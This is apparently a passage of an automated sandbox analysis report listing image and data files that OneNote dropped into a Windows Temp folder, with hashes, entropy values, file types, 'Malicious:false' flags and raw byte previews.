                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6A0072D2-E3C9-4E8F-9ED9-8B053B33BB74}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):53259
                                                                                                                                                                                                                  Entropy (8bit):7.651662052139301
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                                  MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                                  SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                                  SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                                  SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6B7563C2-DDBD-4276-AE6B-AE6558BE2BB2}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65589
                                                                                                                                                                                                                  Entropy (8bit):7.960181939300061
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                                                                                                                                  MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                                                                                                                                  SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                                                                                                                                  SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                                                                                                                                  SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6BF8A2FD-2C19-47B5-93D1-0299ED99995E}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6D375BF8-F7BC-46C8-8DA6-C3FADED5E748}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2268
                                                                                                                                                                                                                  Entropy (8bit):7.384274251000273
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                                                                                                                                  MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                                                                                                                                  SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                                                                                                                                  SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                                                                                                                                  SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6D7F7614-65D7-4BB4-995A-E20469E02967}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2898
                                                                                                                                                                                                                  Entropy (8bit):7.551512280854713
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                                                                                                                                  MD5:7C7D9922101488124D2E4666709198AC
                                                                                                                                                                                                                  SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                                                                                                                                  SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                                                                                                                                  SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6DCEBB62-A6A6-4F1F-8C7B-AE3232EA9C74}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6E6765A9-7C59-487D-848C-C0A96E51E18C}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6F04B0E8-7756-4A11-868F-9B247313D202}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{6FF806AA-FAE6-425B-8777-EB1AF4D0E8D9}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4744
                                                                                                                                                                                                                  Entropy (8bit):0.707604136385155
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:Iai5Yyfh3h1qX4h9XUnfaJ8qpZ0ti/BoOHKZQ/Vv/8Ruj8lvClax/m/MRujd:InYyfdqXAUfaLRBoOoMVnUV/x/uF
                                                                                                                                                                                                                  MD5:EDDFBA6AFF4E879F126BC81FC6309996
                                                                                                                                                                                                                  SHA1:45FA82460D69A132F730546E0E03752B39F2E050
                                                                                                                                                                                                                  SHA-256:EB3AC151168CC55ACE8A0B6753205C54C3CE714D0B78220128B6E90CF4EF6C09
                                                                                                                                                                                                                  SHA-512:E7939AB7185CAA4FC170F1FB9199D7C308DF5625A4359DED3BDF15621252F9359CC5DC96B6F244B2E2688CB661F3E021CBBAD4436388E09C0BC5AAB2989EDB30
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.R\{..M..Sx.).....<!4M.#..^p.................?.....I.......*...*...*...*..................................................."N...%G...]...G0.......................h.............................................p/.A_O..Y=.a.e..........sHr.J..|..T...............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{705BFBBD-AD07-4A50-8BBE-AE4D63916A4E}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{70CE6078-AAC5-4C7C-99BB-DCB698E83C36}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{716672EA-4E54-49DD-94BC-B1ACB156842D}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
